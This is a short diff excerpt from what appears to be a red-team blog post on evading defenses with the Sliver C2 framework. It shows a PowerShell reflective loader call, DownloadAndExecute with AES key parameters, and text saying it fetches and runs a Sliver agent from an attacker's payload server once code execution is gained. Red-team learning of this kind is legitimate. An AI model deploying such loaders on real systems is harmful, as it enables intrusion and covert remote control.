bytebl33d/bytebl33d.github.io/blog/sliver-evasion.md

 [serpent.Loader]::DownloadAndExecute($url,$TargetBinary,$CompressionAlgorithm,$AESKey,$AESIV)
 ```

 This script is a PowerShell loader that is hosted on our server, intented to be downloaded and executed once an attacker gains code execution.
-The script will load the stager into memory via reflection and performs the `DownloadAndExecute` operation of the agent from the staging server.
+The script will load the stager into memory via reflection and performs the `DownloadAndExecute` operation that downloads our Sliver agent from our payload server and executes it.

 ## Sliver in Action
 Moving to our attack machine, we run our Python HTTP server where our shellcode is located.